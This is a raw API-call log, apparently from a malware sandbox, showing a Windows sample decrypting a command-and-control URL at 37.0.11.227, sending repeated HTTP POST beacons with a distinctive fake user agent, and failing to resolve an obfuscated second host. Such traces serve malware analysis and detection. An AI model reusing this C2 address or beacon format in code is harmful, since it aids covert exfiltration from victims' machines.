[0254.273] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0254.282] GetProcessHeap () returned 0x690000 [0254.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0254.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.284] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0254.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.285] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.286] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.286] GetProcessHeap () returned 0x690000 [0254.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0254.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.287] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0254.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.289] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0254.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.290] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0254.290] GetProcessHeap () returned 0x690000 [0254.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0254.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.291] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0254.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.292] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0254.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.294] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0254.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.295] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0254.295] GetProcessHeap () returned 0x690000 [0254.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0254.295] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0254.295] GetProcessHeap () returned 0x690000 [0254.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0254.295] socket (af=2, type=1, protocol=6) returned 0x738 [0254.295] connect (s=0x738, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0254.325] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0254.325] GetProcessHeap () returned 0x690000 [0254.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0254.325] GetProcessHeap () returned 0x690000 [0254.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0254.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0254.330] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.330] GetProcessHeap () returned 0x690000 [0254.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0254.330] GetProcessHeap () returned 0x690000 [0254.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0254.331] GetProcessHeap () returned 0x690000 [0254.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0254.331] GetProcessHeap () returned 0x690000 [0254.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0254.332] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0254.333] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.333] GetProcessHeap () returned 0x690000 [0254.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0254.333] GetProcessHeap () returned 0x690000 [0254.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0254.333] send (s=0x738, buf=0x6ad508*, len=242, flags=0) returned 242 [0254.333] send (s=0x738, buf=0x6aba40*, len=159, flags=0) returned 159 [0254.333] GetProcessHeap () returned 0x690000 [0254.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0254.334] recv (in: s=0x738, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0254.409] GetProcessHeap () returned 0x690000 [0254.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0254.410] GetProcessHeap () returned 0x690000 [0254.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0254.410] GetProcessHeap () returned 0x690000 [0254.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0254.411] GetProcessHeap () returned 0x690000 [0254.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0254.411] closesocket (s=0x738) returned 0 [0254.412] GetProcessHeap () returned 0x690000 [0254.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0254.412] GetProcessHeap () returned 0x690000 [0254.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0254.412] GetProcessHeap () returned 0x690000 [0254.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0254.413] GetProcessHeap () returned 0x690000 [0254.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0254.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d4) returned 0x738 [0254.415] Sleep (dwMilliseconds=0xea60) [0254.443] GetProcessHeap () returned 0x690000 [0254.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0254.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.444] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.576] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0254.903] GetProcessHeap () returned 0x690000 [0254.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0254.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.905] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0254.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.906] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.958] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.960] GetProcessHeap () returned 0x690000 [0254.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0254.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.962] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0254.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.993] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0254.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0254.994] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0254.994] GetProcessHeap () returned 0x690000 [0254.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0254.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.995] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.997] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.000] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.001] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.001] GetProcessHeap () returned 0x690000 [0255.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0255.001] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.002] GetProcessHeap () returned 0x690000 [0255.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0255.002] GetProcessHeap () returned 0x690000 [0255.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.003] GetProcessHeap () returned 0x690000 [0255.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0255.003] GetProcessHeap () returned 0x690000 [0255.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0255.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.004] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.012] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0255.023] GetProcessHeap () returned 0x690000 [0255.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0255.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.025] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.026] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.032] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.032] GetProcessHeap () returned 0x690000 [0255.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0255.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.033] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0255.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.034] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.035] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0255.035] GetProcessHeap () returned 0x690000 [0255.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.036] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.037] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.038] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.039] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.039] GetProcessHeap () returned 0x690000 [0255.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0255.039] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.039] GetProcessHeap () returned 0x690000 [0255.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0255.039] socket (af=2, type=1, protocol=6) returned 0x73c [0255.040] connect (s=0x73c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0255.074] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0255.074] GetProcessHeap () returned 0x690000 [0255.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0255.074] GetProcessHeap () returned 0x690000 [0255.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0255.078] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.079] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.079] GetProcessHeap () returned 0x690000 [0255.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0255.080] GetProcessHeap () returned 0x690000 [0255.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.080] GetProcessHeap () returned 0x690000 [0255.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0255.080] GetProcessHeap () returned 0x690000 [0255.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0255.081] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.082] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.082] GetProcessHeap () returned 0x690000 [0255.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0255.082] GetProcessHeap () returned 0x690000 [0255.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.083] send (s=0x73c, buf=0x6ad508*, len=242, flags=0) returned 242 [0255.083] send (s=0x73c, buf=0x6aba40*, len=159, flags=0) returned 159 [0255.083] GetProcessHeap () returned 0x690000 [0255.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0255.083] recv (in: s=0x73c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0255.165] GetProcessHeap () returned 0x690000 [0255.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0255.166] GetProcessHeap () returned 0x690000 [0255.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0255.167] GetProcessHeap () returned 0x690000 [0255.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0255.167] GetProcessHeap () returned 0x690000 [0255.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0255.167] closesocket (s=0x73c) returned 0 [0255.168] GetProcessHeap () returned 0x690000 [0255.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0255.168] GetProcessHeap () returned 0x690000 [0255.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.169] GetProcessHeap () returned 0x690000 [0255.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.169] GetProcessHeap () returned 0x690000 [0255.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0255.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d8) returned 0x73c [0255.171] Sleep (dwMilliseconds=0xea60) [0255.173] GetProcessHeap () returned 0x690000 [0255.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0255.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.174] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.182] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0255.190] GetProcessHeap () returned 0x690000 [0255.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0255.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.192] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.194] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.197] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.197] GetProcessHeap () returned 0x690000 [0255.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0255.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.198] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0255.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.199] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.200] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0255.200] GetProcessHeap () returned 0x690000 [0255.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0255.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.201] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.202] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.203] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.203] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.203] GetProcessHeap () returned 0x690000 [0255.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0255.209] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.209] GetProcessHeap () returned 0x690000 [0255.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0255.210] GetProcessHeap () returned 0x690000 [0255.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0255.210] GetProcessHeap () returned 0x690000 [0255.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.211] GetProcessHeap () returned 0x690000 [0255.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0255.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.218] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0255.223] GetProcessHeap () returned 0x690000 [0255.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0255.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.224] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.225] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.226] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.226] GetProcessHeap () returned 0x690000 [0255.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0255.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.231] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, 